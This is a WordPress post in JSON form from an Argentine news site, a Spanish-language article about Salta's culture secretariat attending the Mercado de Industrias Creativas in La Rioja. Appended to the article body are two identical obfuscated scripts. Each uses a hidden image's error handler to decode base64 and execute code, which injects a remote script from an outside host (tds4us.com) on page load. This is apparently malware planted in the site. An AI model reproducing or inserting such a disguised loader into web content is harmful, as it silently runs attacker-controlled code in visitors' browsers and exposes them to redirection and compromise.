{"id":2216,"date":"2023-02-12T22:10:24","date_gmt":"2023-02-13T01:10:24","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2216"},"modified":"2025-08-14T00:23:26","modified_gmt":"2025-08-14T03:23:26","slug":"salta-participo-del-encuentro-regional-mercado-de-industrias-creativas","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2216","title":{"rendered":"Salta participa del encuentro regional Mercado de Industrias Creativas"},"content":{"rendered":"\n<h3 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#b00970\"><em>La Secretar\u00eda de Cultura de la Provincia acompa\u00f1a el encuentro regional del Mercado de Industrias Creativas en La Rioja, en donde se desarrollan talleres, actividades culturales y reconocimientos hacia hacedores culturales y artistas destacados por su aporte a la Cultura del noroeste argentino.<\/em><\/h3>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/agenda-mic-web-1-1024x828.jpg\" alt=\"\" class=\"wp-image-2222\" width=\"251\" height=\"203\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/agenda-mic-web-1-1024x828.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/agenda-mic-web-1-300x243.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/agenda-mic-web-1-768x621.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/agenda-mic-web-1-1536x1243.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/agenda-mic-web-1-696x563.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/agenda-mic-web-1-1068x864.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/agenda-mic-web-1-519x420.jpg 519w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/agenda-mic-web-1.jpg 1701w\" sizes=\"(max-width: 251px) 100vw, 251px\" \/><figcaption class=\"wp-element-caption\">Agenda completa <a href=\"https:\/\/culturalarioja.gob.ar\/wp-content\/uploads\/2023\/01\/AGENDA-MIC.pdf\" target=\"_blank\" rel=\"noopener\" title=\"\">AQUI<\/a><\/figcaption><\/figure><\/div>\n\n\n<p>En La Rioja se desarrolla el Mercado de industrias Creativas del que participan las principales autoridades culturales de Naci\u00f3n y regi\u00f3n del Noroeste Argentino. El MIC es un espacio de circulaci\u00f3n y visibilidad del potencial de las industrias culturales y emprendedurismo que se realiza en la capital riojana, en el marco de las pol\u00edticas de fortalecimiento, desarrollo econ\u00f3mico, cultural y social a nivel regional.<\/p>\n\n\n\n<p>Durante esta edici\u00f3n se realizar\u00e1 tambi\u00e9n la inauguraci\u00f3n del Parque Acu\u00e1tico ubicado en Posta Policial, en inmediaciones del t\u00fanel de Sanagasta, de la cual participar\u00e1 el gabinete Nacional y Provincial de Cultura.<\/p>\n\n\n\n<p>Asimismo, se desarrollar\u00e1 la charla \u201cMercado de las industrias Culturales y Creativas\u201d, para fortalecer y potenciar la gesti\u00f3n y pol\u00edticas gubernamentales en bloque a nivel regional. En este marco, se dar\u00e1n a conocer c\u00f3mo se emplean diferentes estrategias culturales y las proyecciones estimadas a nivel nacional del MICA para el 2023 a cargo de Lucrecia Cardozo, secretaria de Desarrollo Cultural de la Naci\u00f3n; Gustavo Romero, director de Coordinaci\u00f3n del Consejo Federal de Cultura y Patricia Herrera; secretaria de Culturas La Rioja en el Paseo Cultural Castro Barros.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5718-salta-participa-del-encuentro-regional-mercado-de-industrias-creativas.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5718-salta-participa-del-encuentro-regional-mercado-de-industrias-creativas.jpg\" alt=\"Salta participa del encuentro regional Mercado de Industrias Creativas\" width=\"409\" height=\"265\"\/><\/a><\/figure><\/div>\n\n\n<p>Durante el acto de apertura, el secretario de Cultura,&nbsp;<strong>Diego Ashur Mas<\/strong>&nbsp;acompa\u00f1\u00f3 el reconocimiento hacia hacedores culturales y artistas por su aporte a la cultura regional del Noroeste Argentino, en apoyo a quienes alienten, valoren e incentiven al crecimiento de producci\u00f3n de capital cultural y potencien artistas regionales.<\/p>\n\n\n\n<p>Cabe destacar que durante el a\u00f1o 2022, a nivel regional las dependencias estatales nacionales y culturales de la regi\u00f3n trabajan en acciones tendientes a fortalecer el sector de las industrias culturales y creativas en todos sus sectores: artes visuales, artesan\u00edas, editorial, audiovisual, animaci\u00f3n y videojuegos, dise\u00f1o, m\u00fasica, artes esc\u00e9nicas, hip hop y circo. Una de ellas en nuestra provincia es el Fondo Ciudadano de Desarrollo Cultural, el cual actualmente se encuentra convocando a quienes deseen concretar sus proyectos culturales con financiamientos hasta $220.000 hasta el 22 de febrero del corriente a\u00f1o.<\/p>\n\n\n\n<p>FONDO CIUDADANO DE DESARROLLO CULTURAL&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/www.culturasalta.gov.ar\/concursos-convocatorias\/\/fondo-ciudadano-de-desarrollo-cultural-2023\/131\">https:\/\/www.culturasalta.gov.ar\/concursos-convocatorias\/\/fondo-ciudadano-de-desarrollo-cultural-2023\/131<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-participa-del-encuentro-regional-mercado-de-industrias-creativas-87824\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Secretar\u00eda de Cultura de la Provincia acompa\u00f1a el encuentro regional del Mercado de Industrias Creativas en La Rioja, en donde se desarrollan talleres, actividades culturales y reconocimientos hacia hacedores culturales y artistas destacados por su aporte a la Cultura del noroeste argentino. En La Rioja se desarrolla el Mercado de industrias Creativas del que [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2217,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26],"tags":[],"class_list":{"0":"post-2216","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2216"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2216"}],"version-history":[{"count":5,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2216\/revisions"}],"predecessor-version":[{"id":7178,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2216\/revisions\/7178"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2217"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2216"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2216"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2216"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}